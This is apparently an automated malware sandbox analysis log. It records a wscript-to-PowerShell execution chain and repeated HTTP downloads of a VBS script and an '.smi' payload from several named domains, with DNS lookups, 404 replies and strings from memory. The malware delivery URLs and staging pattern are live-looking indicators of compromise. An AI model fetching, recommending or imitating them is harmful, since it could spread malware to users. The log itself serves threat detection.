          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbE source: powershell.exe, 00000005.00000002.1434410083.000001B65CC9A000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:25 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:45 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:57 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:09 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:20 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:32 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:44 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:55 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:07 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000005.00000002.1433777398.000001B65CBF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000002.00000002.1606334423.000002CD5FBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645A83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD487B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Su
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sub
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subo
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subor
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subord
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordi
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordin
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordine
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordiner
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinere
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordineren
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerend
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerende
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes7
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.s
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.in
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/
